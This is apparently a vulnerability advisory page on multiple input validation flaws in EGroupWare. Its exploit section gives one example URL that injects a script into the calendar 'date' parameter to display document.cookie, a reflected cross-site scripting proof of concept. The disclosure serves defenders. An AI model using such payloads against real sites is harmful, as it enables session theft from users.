• info
• discussion
• exploit
• solution
• references

EGroupWare Multiple Input Validation Vulnerabilities

There are no exploits required. The following examples are available:

http://www.example.com/egroupware/index.php?menuaction=calendar.uicalendar.day&date=20040701">&lt;script&gt;alert(document.cookie)</script